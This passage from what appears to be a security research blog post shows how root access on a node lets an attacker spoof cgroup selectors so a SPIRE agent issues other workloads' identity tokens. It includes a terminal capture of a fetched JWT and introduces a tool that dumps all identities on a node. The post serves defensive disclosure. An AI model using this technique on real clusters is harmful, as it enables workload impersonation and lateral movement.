newton@mars:~$ /opt/spire/bin/spire-agent-1.12.4 api fetch jwt -audience my-service -socketPath /run/spire/sockets/agent.sock token(spiffe://example.org/ns/a/sa/a): eyJhbGciOiJSUzI1NiIsImtpZCI6InoyRHRZbDMySlZsTWM0aUVLcWNmRlVvdTlxUjZjcURPIiwidHlwIjoiSldUIn0.eyJhdWQiOlsibXktc2VydmljZSJdLCJleHAiOjE3NjAyOTMzMjAsImlhdCI6MTc2MDI5MzAyMCwic3ViIjoic3BpZmZlOi8vZXhhbXBsZS5vcmcvbnMvYS9zYS9hIn0.bDgJ67m1VkiwVSUtwK4ljE3IdxrTr8sekXWbl7YI8y8erNY5UulwOAcP9gtSrWZcM5Kpm9jx2EjP6-F87bUw9\_hiGv11kq\_9jYrYVr\_c987oQLGebXunEeNGLEz0tndICmZ7CMisFkUNaYPT0W\_XdZrdO0OQnH\_FLNPfVwlhA7nY3xDQXdk2oAxnUjrCGyJVKVuu461SVPs-92ttbpAdfz7J4YkbL6PxwEr2iG6x2XXYrSzKmFC5JamqMXj1kYA7nEH4asHV2d9bOQUiHeejgdxnrU53a3okN2-uM1lnTU8aXAMdSMw3D9rRyO\_0-9xC2uvMyjKi0GGTybJCwIHGVg bundle(spiffe://example.org): { "keys": \[ { "kty": "RSA", "kid": "z2DtYl32JVlMc4iEKqcfFUou9qR6cqDO", "n": "05g3npQaw7ypPMZ\_cbpCAgr-VGX4JUNH6TgbXZlKvWho\_CGR\_ftTABAAGb6QUB0a3Nreg9oPUHGST8vdTvx-eDjW5YBQ1uMlqpXRxqy41532jo0a-xjqpQ\_CKTq7NVZXn-5ZZp5lvS58atk8ydk7jrHsn\_TyXsPx7fSOk1I8wQha3ouW83H3017IMfdn-TmXSJIfRvaEAZG4k3EuKGSGq6RZ4lyu-yDk6IvsJZVUWKPh-aPTL3ae4nSgzIt2\_bt5mRBfcO-Gqsumd8YqofFOfDmGLU5-CXwVCUvMEO0MwT2UAg2F-HzJLTkxg51QlQhPodIG1R3zFO6Bt4bZK9eglQ", "e": "AQAB" } \] }

|-------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 | newton@mars:~$ /opt/spire/bin/spire-agent-1.12.4 api fetch jwt -audience my-service -socketPath /run/spire/sockets/agent.sock token(spiffe://example.org/ns/a/sa/a): eyJhbGciOiJSUzI1NiIsImtpZCI6InoyRHRZbDMySlZsTWM0aUVLcWNmRlVvdTlxUjZjcURPIiwidHlwIjoiSldUIn0.eyJhdWQiOlsibXktc2VydmljZSJdLCJleHAiOjE3NjAyOTMzMjAsImlhdCI6MTc2MDI5MzAyMCwic3ViIjoic3BpZmZlOi8vZXhhbXBsZS5vcmcvbnMvYS9zYS9hIn0.bDgJ67m1VkiwVSUtwK4ljE3IdxrTr8sekXWbl7YI8y8erNY5UulwOAcP9gtSrWZcM5Kpm9jx2EjP6-F87bUw9\_hiGv11kq\_9jYrYVr\_c987oQLGebXunEeNGLEz0tndICmZ7CMisFkUNaYPT0W\_XdZrdO0OQnH\_FLNPfVwlhA7nY3xDQXdk2oAxnUjrCGyJVKVuu461SVPs-92ttbpAdfz7J4YkbL6PxwEr2iG6x2XXYrSzKmFC5JamqMXj1kYA7nEH4asHV2d9bOQUiHeejgdxnrU53a3okN2-uM1lnTU8aXAMdSMw3D9rRyO\_0-9xC2uvMyjKi0GGTybJCwIHGVg bundle(spiffe://example.org): { "keys": \[ { "kty": "RSA", "kid": "z2DtYl32JVlMc4iEKqcfFUou9qR6cqDO", "n": "05g3npQaw7ypPMZ\_cbpCAgr-VGX4JUNH6TgbXZlKvWho\_CGR\_ftTABAAGb6QUB0a3Nreg9oPUHGST8vdTvx-eDjW5YBQ1uMlqpXRxqy41532jo0a-xjqpQ\_CKTq7NVZXn-5ZZp5lvS58atk8ydk7jrHsn\_TyXsPx7fSOk1I8wQha3ouW83H3017IMfdn-TmXSJIfRvaEAZG4k3EuKGSGq6RZ4lyu-yDk6IvsJZVUWKPh-aPTL3ae4nSgzIt2\_bt5mRBfcO-Gqsumd8YqofFOfDmGLU5-CXwVCUvMEO0MwT2UAg2F-HzJLTkxg51QlQhPodIG1R3zFO6Bt4bZK9eglQ", "e": "AQAB" } \] } |

We can also see the workload-a SPIFFE ID inside the JWT token:  
Shell  
"sub": "spiffe://example.org/ns/a/sa/a"

|---|-----------------------------------------|
| 1 | "sub": "spiffe://example.org/ns/a/sa/a" |

The manual spoofing demonstration highlights that the security model relies entirely on a single, vulnerable assumption of node integrity. When we have root access, we can get the identity of any workload on the node.

This manual spoofing demonstration highlights a critical trust assumption in workload attestation. When an attacker has root-level access to a node, they can manipulate cgroup information to cause the SPIRE agent to misattribute workload identities. Under these conditions, the attacker can impersonate other workloads running on the same node and obtain their identities.

## Spooffe

These findings motivated us to develop [Spooffe](https://github.com/PaloAltoNetworks/spooffe), a tool that allows defenders to automate selector spoofing to retrieve all the workload identities from the node.

Spooffe scans the node for running workloads, discovers their cgroup paths, and replicates them as a mock cgroup for its own process. It then queries the local SPIRE agent for the resulting identities (SVIDs), allowing us to collect all workload identities present on the host (Figure 5).
![A screenshot of a terminal displaying a command line output related to Kubernetes. The text includes creation and verification of a fake group, fetched JWTs, and viewing various certificates. It features commands like `spoofre` and directories related to Kubernetes pods.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/word-image-764051-186732-6.png) Figure 5: Dumping all workloads' identities (SVIDs).

Besides selector spoofing, Spooffe includes additional capabilities. However, in this post we focus only on the features relevant to this research.

One such capability is agent impersonation, which examines whether an attacker can impersonate the SPIRE agent and communicate directly with the server to extract workload identities.

## Conclusion

In this article, we demonstrated how an attacker with root access on a compromised node can misuse SPIFFE/SPIRE workload attestation to impersonate co-located workloads and retrieve their identities. By manipulating cgroup metadata, we showed how attackers could mislead the SPIRE agent into issuing valid SVIDs to an attacker-controlled process. We also introduced [Spooffe](https://github.com/PaloAltoNetworks/spooffe), a tool that automates this technique to enumerate and extract workload identities from a node.

These findings highlight a fundamental assumption in workload identity systems: trust in the underlying node. While SPIFFE/SPIRE enforces strong cryptographic identity guarantees between workloads, those guarantees rely on the integrity of the environment where attestation occurs. Once that trust boundary is broken, identity isolation between workloads collapses, allowing attackers to move laterally using legitimate credentials rather than stolen secrets.

Organizations adopting workload identity should treat node-level compromise as equivalent to compromise of all identities scoped to that node. To reduce risk, restrict privileged containers, limit direct host access and minimize reliance on weak or easily spoofable selectors.

Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the [Cyber Threat Alliance](https://www.cyberthreatalliance.org/).

## Palo Alto Networks Product Protections

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

* [Cortex XDR](https://docs-cortex.paloaltonetworks.com/p/XDR) and [XSIAM](https://docs-cortex.paloaltonetworks.com/p/XSIAM) can help protect against post-exploitation activities using the multi-layer protection approach. This approach combines several layers of protection, including [Advanced WildFire](https://docs.paloaltonetworks.com/wildfire), Behavioral Threat Protection, and [Endpoint Protection Modules](https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/Cortex-XDR-3.x-Documentation/Malware-protection) (EPM).
* [Cortex Cloud Identity Threat Detection](https://cortex-docs.paloaltonetworks.com/cortex-cloud-runtime-security/cortex-cloud-identity-security/what-is-cortex-cloud-identity-security)can help deliver end-to-end visibility across cloud providers and IdPs by baselining real-time access patterns. By continuously monitoring these behaviors, ITDR detects identity abuse and compromised credentials targeting critical cloud resources and Kubernetes workloads, automatically triggering containment actions to keep attackers out.

If you think you might have been compromised or have an urgent matter, get in touch with the [Unit 42 Incident Response team](https://start.paloaltonetworks.com/contact-unit42.html) or call:

* North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
* UK: +44.20.3743.3660
* Europe and Middle East: +31.20.299.3130
* Asia: +65.6983.8730
* Japan: +81.50.1790.0200
* Australia: +61.2.4062.7950
* India: 000 800 050 45107
* South Korea: +82.080.467.8774

## Additional Resources

* [Spooffe](https://github.com/PaloAltoNetworks/spooffe) --- GitHub
  Back to top

### Tags

* [API](https://unit42.paloaltonetworks.com/tag/api/ "API")
* [Cryptographic](https://unit42.paloaltonetworks.com/tag/cryptographic/ "cryptographic")
* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")
* [Linux](https://unit42.paloaltonetworks.com/tag/linux/ "Linux")
* [Node](https://unit42.paloaltonetworks.com/tag/node/ "node")
* [SPIFFE](https://unit42.paloaltonetworks.com/tag/spiffe/ "SPIFFE")
* [SPIRE](https://unit42.paloaltonetworks.com/tag/spire/ "SPIRE")
* [Spoofing](https://unit42.paloaltonetworks.com/tag/spoofing/ "spoofing")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/ "Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure")

### Table of Contents

* 

### Related Articles

* [Kimwolf v7: An Evolution of the Kimwolf Botnet](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/ "article - table of contents")
* [The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/ "article - table of contents")
* [Gremlin Stealer's Evolved Tactics: Hiding in Plain Sight With Resource Files](https://unit42.paloaltonetworks.com/gremlin-stealer-evolution/ "article - table of contents")

## Related Malware Resources

![Pictorial representation of a pay-per-install threat group campaign prodiving infection service for spreading malware. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip, symbolizing data processing and transfer. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Malware_Category_1920x900-6-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 9, 2026 [#### Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/)

* [ARKTunnel](https://unit42.paloaltonetworks.com/tag/arktunnel/ "ARKTunnel")

* [C2](https://unit42.paloaltonetworks.com/tag/c2/ "C2")

* [CL-CRI-1171](https://unit42.paloaltonetworks.com/tag/cl-cri-1171/ "CL-CRI-1171")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/ "Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure")  
  ![Pictorial representation of attackers using AI tools to target Latin American organizations. A vibrant cityscape with silhouettes of numerous people walking along a bustling street. The scene is illuminated by bright urban lights and digital-like particles, creating a dynamic and futuristic atmosphere.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/AdobeStock_768915868-2-1-786x373.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 3, 2026 [#### Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/)

* [Agentic AI](https://unit42.paloaltonetworks.com/tag/agentic-ai/ "Agentic AI")

* [ChatGPT](https://unit42.paloaltonetworks.com/tag/chatgpt/ "ChatGPT")

* [CL-CRI-1131](https://unit42.paloaltonetworks.com/tag/cl-cri-1131/ "CL-CRI-1131")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/ "Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America")  
  ![Pictorial representation of vishing campaigns in Microsoft Teams. A digital image of a skull formed by blue binary code on a black background, with scattered ones and zeros and digital noise, symbolizes how stealthy prompt injection attacks can exploit AI logic to bypass security controls.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/01_Malware_Category_1920x900-5-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 31, 2026 [#### Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/)

* [Cloaked Ursa](https://unit42.paloaltonetworks.com/tag/cloaked-ursa/ "Cloaked Ursa")

* [Entra ID](https://unit42.paloaltonetworks.com/tag/entra-id/ "Entra ID")

* [Microsoft Teams](https://unit42.paloaltonetworks.com/tag/microsoft-teams/ "Microsoft Teams")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/ "Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams")  
  ![Pictorial representation of AI-enabled malware. A vibrant digital interface displaying various icons and graphs, resembling a futuristic network or data analysis dashboard. The scene is illuminated with glowing lights and patterns.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1270203474-2-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 25, 2026 [#### The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/)

* [Backdoor](https://unit42.paloaltonetworks.com/tag/backdoor/ "backdoor")

* [Bitcoin](https://unit42.paloaltonetworks.com/tag/bitcoin/ "Bitcoin")

* [DLL hijacking](https://unit42.paloaltonetworks.com/tag/dll-hijacking/ "DLL hijacking")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/ "The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution")  
  ![Pictorial representation of identity abuse through trusted communication channels. Close-up view of a digital screen displaying a glitched and pixelated image of a skull-like shape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/02_Malware_Category_1920x900-2-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 20, 2026 [#### Identity Abuse Through Trusted Communication Channels](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/)

* [Authentication](https://unit42.paloaltonetworks.com/tag/authentication/ "authentication")

* [Identity theft](https://unit42.paloaltonetworks.com/tag/identity-theft/ "identity theft")

* [Malware](https://unit42.paloaltonetworks.com/tag/malware/ "malware")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/ "Identity Abuse Through Trusted Communication Channels")  
  ![Pictorial representation of Kimwolf botnet malware family. Digital screen with a warning sign reading "Malware." The background features lines of computer code and graphics, creating a sense of cybersecurity threat.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/07_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 11, 2026 [#### Kimwolf v7: An Evolution of the Kimwolf Botnet](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/)

* [Android APK](https://unit42.paloaltonetworks.com/tag/android-apk/ "Android APK")

* [Ethereum](https://unit42.paloaltonetworks.com/tag/ethereum/ "Ethereum")

* [HTTP](https://unit42.paloaltonetworks.com/tag/http/ "HTTP")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/ "Kimwolf v7: An Evolution of the Kimwolf Botnet")  
  ![Pictorial representatiom pf Aeternum's blockchain C2. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/04_Malware_Category_1920x900-4-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 10, 2026 [#### The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/)

* [Aeternum](https://unit42.paloaltonetworks.com/tag/aeternum/ "Aeternum")

* [Infection chain](https://unit42.paloaltonetworks.com/tag/infection-chain/ "infection chain")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/ "The Permanent Threat: Analyzing Aeternum’s Blockchain-Based C2 Operations and Communications")  
  ![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) August 6, 2026 [#### ChainDrop: Inside a Self-Propagating npm Worm](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/tag/blockchain/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/tag/claude-code/ "Claude code")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/ "ChainDrop: Inside a Self-Propagating npm Worm")  
  ![Pictorial representation of Token-jacking. A person types on a laptop with multiple digital interface elements projected, including an "AI" icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1246251272-2-786x369.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 6, 2026 [#### Token Jacking: Cybercriminals Could Be Stealing Your AI Resources](https://unit42.paloaltonetworks.com/ai-token-jacking/)

* [AI API](https://unit42.paloaltonetworks.com/tag/ai-api/ "AI API")

* [AI gateway](https://unit42.paloaltonetworks.com/tag/ai-gateway/ "AI gateway")

* [API keys](https://unit42.paloaltonetworks.com/tag/api-keys/ "API keys")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-token-jacking/ "Token Jacking: Cybercriminals Could Be Stealing Your AI Resources")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Get updates from Unit 42

## Peace of mind comes from staying ahead of threats. Subscribe today.

Your Email

Subscribe for email updates to all Unit 42 threat research.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use "Terms of Use") and acknowledge our [Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/privacy "Privacy Statement")

This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.

Invalid captcha!
Subscribe ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security)

* [Secure AI by Design](https://www.paloaltonetworks.com/ai-security)

* [Prisma AIRS](https://www.paloaltonetworks.com/ai-security/prisma-airs)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/ot-security-solution)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase)

* [Prisma SASE](https://www.paloaltonetworks.com/sase)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam)

* [Next-Generation Identity Security](https://www.paloaltonetworks.com/idira)

* [Privileged Access Management](https://www.paloaltonetworks.com/idira/human/privileged-access-management)

* [Identity and Access Management](https://www.paloaltonetworks.com/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.com/idira/human/endpoint-privilege-manager)

* [Identity Governance](https://www.paloaltonetworks.com/idira/human/identity-governance)

* [Workforce Password Management](https://www.paloaltonetworks.com/idira/human/workforce-password-management)

* [Agentic Identities](https://www.paloaltonetworks.com/idira/agentic)

* [Secrets Management](https://www.paloaltonetworks.com/idira/machine/secrets-management)

* [Unified Secrets Governance](https://www.paloaltonetworks.com/idira/machine/unified-secrets-governance)

* [Application Credentials Delivery](https://www.paloaltonetworks.com/idira/machine/application-credentials-delivery)

* [Vendor Privileged Access](https://www.paloaltonetworks.com/idira/human/vendor-privileged-access)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42)

* [Prepare for Emerging Risks](https://www.paloaltonetworks.com/unit42/frontier-ai-defense)

* [Strengthen Your Defenses](https://www.paloaltonetworks.com/unit42/strengthen-your-defenses)

* [Build Your Security Strategy](https://www.paloaltonetworks.com/unit42/build-your-security-strategy)

* [Understand the Adversary](https://www.paloaltonetworks.com/unit42/threat-intelligence)

* [Respond to a Cyber Attack](https://www.paloaltonetworks.com/unit42/respond)  
  Company

* [About Us](https://www.paloaltonetworks.com/about-us)

* [Careers](https://jobs.paloaltonetworks.com/en/)

* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales)

* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Customers](https://www.paloaltonetworks.com/customers)

* [Investor Relations](https://investors.paloaltonetworks.com/)

* [Location](https://www.paloaltonetworks.com/about-us/locations)

* [Newsroom](https://www.paloaltonetworks.com/company/newsroom)  
  Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Communities](https://www.paloaltonetworks.com/communities)

* [Content Library](https://www.paloaltonetworks.com/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Event Center](https://events.paloaltonetworks.com/)

* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)

* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/certifications)

* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)

* [Sitemap](https://www.paloaltonetworks.com/sitemap)

* [Tech Docs](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy)

* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documents](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
